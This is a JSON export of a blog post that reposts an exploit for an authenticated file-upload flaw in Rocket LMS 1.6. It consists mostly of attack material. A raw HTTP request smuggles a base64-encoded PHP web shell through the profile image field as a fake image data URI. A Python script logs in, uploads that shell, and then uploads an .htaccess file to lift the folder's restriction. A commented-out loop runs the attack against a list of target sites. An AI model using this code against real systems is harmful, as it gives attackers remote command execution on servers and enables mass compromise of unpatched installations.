{"id":30628,"date":"2022-09-13T23:02:02","date_gmt":"2022-09-13T19:02:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168348\/rocketlms16-shell.txt"},"modified":"2022-09-14T09:53:55","modified_gmt":"2022-09-14T05:23:55","slug":"rocket-lms-1-6-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/rocket-lms-1-6-shell-upload\/","title":{"rendered":"Rocket LMS 1.6 Shell Upload"},"content":{"rendered":"

# Exploit Title: Rocket LMS – Learning Management System Shell Upload
\n# Exploit Author: th3d1gger
\n# Vendor Homepage: https:\/\/codecanyon.net
\n# Software Link: https:\/\/codecanyon.net\/item\/rocket-lms-learning-management-academy-script\/33120735
\n# Version: Version 1.6
\n# Tested on Ubuntu 18.04<\/p>\n

base64 encode your payload
\nafter data image write your extension
\nupload
\n—–
\nThere is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.<\/p>\n

Enjoy!<\/p>\n

——-Request———–
\nPOST \/panel\/setting HTTP\/1.1
\nHost: localhost
\nContent-Length: 214
\nCache-Control: max-age=0
\nsec-ch-ua: “Chromium”;v=”103″, “.Not\/A)Brand”;v=”99″
\nOrigin: http:\/\/localhost
\nUpgrade-Insecure-Requests: 1
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/103.0.5060.134 Safari\/537.36
\nContent-Type: application\/x-www-form-urlencoded
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9
\nsec-ch-ua-mobile: ?0
\nsec-ch-ua-platform: “Linux”
\nSec-Fetch-Site: same-origin
\nSec-Fetch-Mode: navigate
\nSec-Fetch-Dest: empty
\nReferer: http:\/\/localhost\/panel\/setting\/step\/2
\nAccept-Encoding: gzip, deflate
\nAccept-Language: en-US,en;q=0.9
\nCookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3D
\nConnection: close<\/p>\n

_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo\/Pg==
\n&cover_img=%2Fstore%2F995%2F7.jpg<\/p>\n

Exploit:<\/p>\n

import time
\nimport requests
\nimport base64
\nimport re<\/p>\n

import traceback
\nclass Rocket:
\ndef __init__(self,ssl,host,port,email,password,file):
\nself._url_to_upload = “\/panel\/setting”
\nself._url_to_login = “\/login”
\nself.host = host
\nself.port = port
\nself.ssl = ssl
\nself.email = email
\nself.password = password
\nself.file = file
\ndef get_csrf_token(self,client,URL):<\/p>\n

fromt = client.get(URL)<\/p>\n

if ‘XSRF-TOKEN’ in client.cookies:<\/p>\n

csrftoken = re.findall(r'<input type=”hidden” name=”_token” value=”(.*)”‘,fromt.text)[0]\n

return csrftoken<\/p>\n

else:<\/p>\n

print(“Error while fetching token”)
\nreturn<\/p>\n

def login(self):
\nclient = requests.session()<\/p>\n

if self.ssl == True:
\nssl= “https:\/\/”
\nelse:
\nssl= “http:\/\/”
\nURL = str(ssl+self.host+”:”+self.port+self._url_to_login)
\nURL2 = str(ssl+self.host+”:”+self.port+self._url_to_upload)
\ncsrftoken = self.get_csrf_token(client,URL)
\nfromt = client.get(URL) # sets cookie<\/p>\n

login_data = dict(username=self.email, password=self.password, _token=csrftoken, next=’\/panel’)
\nr = client.post(URL, data=login_data, cookies=client.cookies)<\/p>\n

self.upload_shell(client,URL2)
\nself.upload_htaccess(client,URL2)
\ndef upload_shell(self,client,URL):
\ncsrftoken = self.get_csrf_token(client,URL)
\nwith open(self.file,”r”) as payload:
\nto_base64 = payload.read()<\/p>\n

to_base64 = str(to_base64).encode(“utf-8”)
\nbase64_encoded_data= base64.b64encode(to_base64)
\nbase64_encoded_data = str(base64_encoded_data)[:-1]\nbase64_encoded_data = str(base64_encoded_data)[2:]\n

string = “data:image\/php;base64,”+str(base64_encoded_data)
\ndata = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img=””)
\nr = client.post(URL, data=data, cookies=client.cookies)
\nprint(r.status_code)
\nif r.status_code == 200:
\nprint(“sent and uploaded shell :”+URL+”\\n”)<\/p>\n

else:
\nprint(“couldn’t upload shell”)<\/p>\n

def upload_htaccess(self,client,URL):
\ncsrftoken = self.get_csrf_token(client,URL)<\/p>\n

string = “data:image\/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4=”
\ndata = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img=””)
\nr = client.post(URL, data=data, cookies=client.cookies)
\nprint(r.status_code)
\nif r.status_code == 200:
\nprint(“sent and uploaded htaccess:”+URL+”\\n”)
\nprint(“Go and rename file in filemanager on website”)
\nelse:
\nprint(“couldn’t upload htaccess”)<\/p>\n

elon = Rocket(True,”localhost”,”443″,”student@demo.com”,”student” ,”\/home\/mm1nd\/Desktop\/shell.txt”)
\nelon.login()<\/p>\n

#with dork
\n# try:
\n# with open(“sites.txt”,”r”) as urls:
\n# url = urls.readlines()
\n# ssl = True
\n# port = 443
\n# for line in url:<\/p>\n

# try:
\n# if “sslyok” in line:
\n# port = 80
\n# ssl = False
\n# line = str(line.rstrip(‘%0a’))<\/p>\n

# print(“trying:”+line)
\n# elon = Rocket(ssl,line.rstrip(“\\n”),str(port),”student@demo.com”,”student” ,”\/home\/mm1nd\/Desktop\/shell.txt”)
\n# elon.login()
\n# time.sleep(1)
\n# except Exception:
\n# #traceback.print_exc()
\n# print(“atamadim”)<\/p>\n

# finally:
\n# print(“okey”)
\n# except Exception:
\n# print(“atamadim”)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Rocket LMS – Learning Management System Shell Upload # Exploit Author: th3d1gger # Vendor Homepage: https:\/\/codecanyon.net # Software Link: https:\/\/codecanyon.net\/item\/rocket-lms-learning-management-academy-script\/33120735 # Version: Version 1.6 # Tested on Ubuntu 18.04 base64 encode your payload after data image write your extension upload —– There is .htaccess restriction on rocket lms public folder upload your …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-30628","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30628","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=30628"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30628\/revisions"}],"predecessor-version":[{"id":30694,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30628\/revisions\/30694"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=30628"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=30628"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=30628"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}